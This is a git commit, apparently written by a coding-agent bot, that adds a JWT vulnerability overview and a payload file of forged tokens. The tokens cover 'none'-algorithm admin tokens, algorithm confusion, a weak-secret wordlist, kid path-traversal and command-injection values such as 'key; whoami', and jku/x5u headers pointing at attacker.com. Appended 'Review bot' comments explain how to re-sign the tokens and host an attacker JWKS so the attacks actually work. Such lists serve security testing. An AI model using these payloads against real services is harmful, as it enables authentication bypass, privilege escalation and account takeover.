Add comprehensive payloads and 4 new vulnerability types (SSTI, HTTP Request Smuggling, CORS, JWT)

Co-authored-by: Stalin-143 <161853795+Stalin-143@users.noreply.github.com>
This commit is contained in:
copilot-swe-agent[bot]
2026-01-05 14:50:15 +00:00
parent f2209e214f
commit 68b76036df
13 changed files with 2368 additions and 0 deletions
@@ -0,0 +1,47 @@
# JWT (JSON Web Token) Vulnerabilities
## Description
JWT vulnerabilities occur when JSON Web Tokens are improperly implemented or validated, allowing attackers to forge tokens, escalate privileges, or bypass authentication mechanisms. JWTs are widely used for authentication and authorization in modern web applications.
## Common Vulnerabilities
- **None Algorithm** - Setting `alg` to `none` to bypass signature verification
- **Algorithm Confusion** - Switching from RS256 to HS256
- **Weak Secret Key** - Using weak or default secrets for HMAC
- **Key Injection** - Injecting public key in JWK header
- **Token Expiration** - Missing or improper `exp` validation
- **SQL Injection in Claims** - Injecting SQL in JWT claims
- **XSS in Claims** - Storing and reflecting XSS payloads in JWT
## JWT Structure
```
header.payload.signature
```
- **Header**: Contains algorithm and token type
- **Payload**: Contains claims (user data)
- **Signature**: Cryptographic signature
## Common Attack Vectors
- Authentication endpoints
- Authorization headers
- Cookie-based JWT storage
- URL parameters with JWT
- Local/Session storage
## Impact
- Authentication bypass
- Privilege escalation
- Account takeover
- Access to unauthorized resources
- Identity spoofing
## Testing Approach
1. Decode the JWT to examine header and payload
2. Test with `alg: none` in header
3. Test algorithm confusion (RS256 → HS256)
4. Brute force weak secrets
5. Modify claims (user ID, role, permissions)
6. Test token expiration validation
7. Check for sensitive data exposure in payload
## Payloads
See `jwt-vulnerabilities-payloads.txt` for a comprehensive list of JWT attack payloads.
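Review bot: the Testing Approach (steps 2 to 7) never says that step 5, modifying claims, only has an effect once signature verification has been defeated by one of steps 2 to 4 or is absent on the server; as written a reader may resend edited claims with the original signature and conclude the application is safe. Suggest stating that dependency in step 5 and, in step 3, that algorithm confusion needs the server's RSA public key (typically fetched from a JWKS endpoint, an `x5c` header or the TLS certificate) used byte-for-byte, PEM encoding included, as the HMAC secret. The Common Vulnerabilities list also omits the `kid`, `jku` and `x5u` header injections that `jwt-vulnerabilities-payloads.txt` covers at length; adding those three bullets would keep the description in step with the payload file it points to.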
@@ -0,0 +1,259 @@
# JWT Vulnerabilities Payloads
# None Algorithm Attack
# Change alg to "none" and remove signature
# Original: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoidGVzdCJ9.signature
# Modified: eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiYWRtaW4ifQ.
# Header: {"alg":"none","typ":"JWT"}
eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiYWRtaW4ifQ.
# Header: {"alg":"None","typ":"JWT"}
eyJhbGciOiJOb25lIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiYWRtaW4ifQ.
# Header: {"alg":"NONE","typ":"JWT"}
eyJhbGciOiJOT05FIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiYWRtaW4ifQ.
# Header: {"alg":"nOnE","typ":"JWT"}
eyJhbGciOiJuT25FIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiYWRtaW4ifQ.
# Algorithm Confusion Attack (RS256 to HS256)
# Change algorithm from RS256 to HS256 and sign with public key
# Header: {"alg":"HS256","typ":"JWT"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4ifQ.signature_here
# Weak Secret Brute Force
# Common weak secrets to test
secret
password
123456
12345678
admin
test
jwt
key
default
secret123
password123
qwerty
abc123
letmein
changeme
welcome
monkey
12345
iloveyou
trustno1
dragon
# Modified Claims - Privilege Escalation
# Payload: {"user":"admin"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4ifQ.
# Payload: {"role":"admin"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJyb2xlIjoiYWRtaW4ifQ.
# Payload: {"admin":true}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhZG1pbiI6dHJ1ZX0.
# Payload: {"isAdmin":true}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc0FkbWluIjp0cnVlfQ.
# Payload: {"permissions":["admin","read","write","delete"]}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJwZXJtaXNzaW9ucyI6WyJhZG1pbiIsInJlYWQiLCJ3cml0ZSIsImRlbGV0ZSJdfQ.
# User ID Manipulation
# Payload: {"userId":1}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjF9.
# Payload: {"sub":"1"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxIn0.
# Payload: {"id":1}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MX0.
# Token Expiration Bypass
# Payload: {"exp":9999999999}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjk5OTk5OTk5OTl9.
# Payload: No exp field
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4ifQ.
# Payload: {"exp":null}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOm51bGx9.
# JWK Header Injection
# Header: {"alg":"RS256","typ":"JWT","jwk":{"kty":"RSA","kid":"key1","n":"...","e":"AQAB"}}
eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCIsImp3ayI6eyJrdHkiOiJSU0EiLCJraWQiOiJrZXkxIiwibiI6Ii4uLiIsImUiOiJBUUFCIn19.payload.signature
# Kid Parameter Injection
# Header: {"alg":"HS256","typ":"JWT","kid":"../../public.key"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6Ii4uLy4uL3B1YmxpYy5rZXkifQ.payload.signature
# Header: {"alg":"HS256","typ":"JWT","kid":"/dev/null"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6Ii9kZXYvbnVsbCJ9.payload.signature
# Header: {"alg":"HS256","typ":"JWT","kid":"../../../dev/null"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6Ii4uLy4uLy4uL2Rldi9udWxsIn0.payload.signature
# SQL Injection in Claims
# Payload: {"username":"admin' OR '1'='1"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluJyBPUiAnMSc9JzEifQ.
# Payload: {"user":"admin'--"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4nLS0ifQ.
# XSS in Claims
# Payload: {"name":"<script>alert(1)</script>"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoiPHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0PiJ9.
# Payload: {"comment":"<img src=x onerror=alert(1)>"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJjb21tZW50IjoiPGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPiJ9.
# Empty Signature
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4ifQ.
# Invalid Signature
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4ifQ.invalid
# JKU Header Injection (JWK Set URL)
# Header: {"alg":"RS256","typ":"JWT","jku":"https://attacker.com/jwks.json"}
eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCIsImprdSI6Imh0dHBzOi8vYXR0YWNrZXIuY29tL2p3a3MuanNvbiJ9.payload.signature
# X5U Header Injection (X.509 URL)
# Header: {"alg":"RS256","typ":"JWT","x5u":"https://attacker.com/cert.pem"}
eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCIsIng1dSI6Imh0dHBzOi8vYXR0YWNrZXIuY29tL2NlcnQucGVtIn0.payload.signature
# X5C Header Injection (X.509 Certificate Chain)
# Header: {"alg":"RS256","typ":"JWT","x5c":["MIIC..."]}
eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCIsIng1YyI6WyJNSUlDLi4uIl19.payload.signature
# Critical Header Parameter Bypass
# Header: {"alg":"HS256","typ":"JWT","crit":["exp"],"exp":9999999999}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCIsImNyaXQiOlsiZXhwIl0sImV4cCI6OTk5OTk5OTk5OX0.payload.signature
# Type Confusion
# Header: {"alg":"HS256","typ":"JWE"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXRSJ9.payload.signature
# Null Byte Injection in Kid
# Header: {"alg":"HS256","typ":"JWT","kid":"key\u0000admin"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6ImtleVx1MDAwMGFkbWluIn0.payload.signature
# Command Injection in Kid
# Header: {"alg":"HS256","typ":"JWT","kid":"key; whoami"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6ImtleTsgd2hvYW1pIn0.payload.signature
# Path Traversal in Kid
# Header: {"alg":"HS256","typ":"JWT","kid":"../../../../etc/passwd"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6Ii4uLy4uLy4uLy4uL2V0Yy9wYXNzd2QifQ.payload.signature
# SQL Injection in Kid
# Header: {"alg":"HS256","typ":"JWT","kid":"key' OR '1'='1"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6ImtleScgT1IgJzEnPScxIn0.payload.signature
# Audience Manipulation
# Payload: {"aud":"admin-api"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJhZG1pbi1hcGkifQ.
# Payload: {"aud":["admin","user","guest"]}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOlsiYWRtaW4iLCJ1c2VyIiwiZ3Vlc3QiXX0.
# Issuer Manipulation
# Payload: {"iss":"trusted-issuer"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJ0cnVzdGVkLWlzc3VlciJ9.
# Not Before (nbf) Bypass
# Payload: {"nbf":0}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYmYiOjB9.
# JWT ID (jti) Manipulation
# Payload: {"jti":"admin-token-123"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJqdGkiOiJhZG1pbi10b2tlbi0xMjMifQ.
# Scope Escalation
# Payload: {"scope":"admin read write delete"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzY29wZSI6ImFkbWluIHJlYWQgd3JpdGUgZGVsZXRlIn0.
# Custom Claims Injection
# Payload: {"custom_role":"superadmin"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJjdXN0b21fcm9sZSI6InN1cGVyYWRtaW4ifQ.
# Payload: {"groups":["admin","developers","security"]}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJncm91cHMiOlsiYWRtaW4iLCJkZXZlbG9wZXJzIiwic2VjdXJpdHkiXX0.
# Numeric Value Manipulation
# Payload: {"level":999}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJsZXZlbCI6OTk5fQ.
# Payload: {"credit":999999}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJjcmVkaXQiOjk5OTk5OX0.
# Boolean Manipulation
# Payload: {"verified":true}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ2ZXJpZmllZCI6dHJ1ZX0.
# Payload: {"premium":true}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJwcmVtaXVtIjp0cnVlfQ.
# Array Injection
# Payload: {"roles":["admin","superuser","root"]}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJyb2xlcyI6WyJhZG1pbiIsInN1cGVydXNlciIsInJvb3QiXX0.
# Null Value Injection
# Payload: {"userId":null}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOm51bGx9.
# Negative Values
# Payload: {"userId":-1}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOi0xfQ.
# Large Numbers
# Payload: {"userId":2147483647}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjIxNDc0ODM2NDd9.
# Unicode Injection
# Payload: {"user":"admin\u0000"}
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW5cdTAwMDAifQ.
# Base64 URL Encoding Issues
# Missing padding
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4ifQ.signature
# Extra padding
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9==.eyJ1c2VyIjoiYWRtaW4ifQ==.signature==
# Standard base64 instead of base64url
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9+.eyJ1c2VyIjoiYWRtaW4ifQ/.signature+
# JWT Confusion with Session Tokens
# Use JWT where session token expected
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4ifQ.
# Empty JWT
..
# Malformed JWT
malformed.jwt.token
header.payload
.payload.signature
header..signature
# JWT in URL
https://target.com/api?token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4ifQ.signature
# JWT in Cookie
Cookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4ifQ.signature
# Multiple JWTs
Authorization: Bearer jwt1, Bearer jwt2
# JWT with extra segments
header.payload.signature.extra
# Case-sensitive Algorithm
# Header: {"alg":"hs256","typ":"JWT"}
eyJhbGciOiJoczI1NiIsInR5cCI6IkpXVCJ9.payload.signature
# Header: {"alg":"Hs256","typ":"JWT"}
eyJhbGciOiJIczI1NiIsInR5cCI6IkpXVCJ9.payload.signature
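Review bot: most of the tokens from "Modified Claims - Privilege Escalation" down to "Unicode Injection" (the `eyJhbGciOiJIUzI1NiIs...` tokens ending in a bare `.`) carry an HS256 header with an empty signature, so every one of them reduces to the single "Empty Signature" case and is rejected by any library that verifies at all; the file should say that each modified payload must be re-signed (with a cracked secret, the `none` header, or the confusion key) before use, or list only the payload JSON and drop the unsigned encodings. Two labels are wrong: under "Base64 URL Encoding Issues" the "Missing padding" token is a correctly encoded JWT, since RFC 7515 base64url omits padding, so it tests nothing, and "Critical Header Parameter Bypass" puts `exp` in the header, where a verifier that implements `crit` must reject a token naming an extension it does not understand and one that ignores `crit` still checks the payload `exp`, so the entry exercises `crit` handling rather than an expiry bypass. The JWK, jku/x5u/x5c and algorithm-confusion entries still contain placeholders (`"n":"..."`, `payload.signature`, `signature_here`); a one-line recipe per section (generate an RSA key pair, embed its public `n`/`e`, sign with the private key; host the JWKS at the attacker-controlled URL) would make them usable.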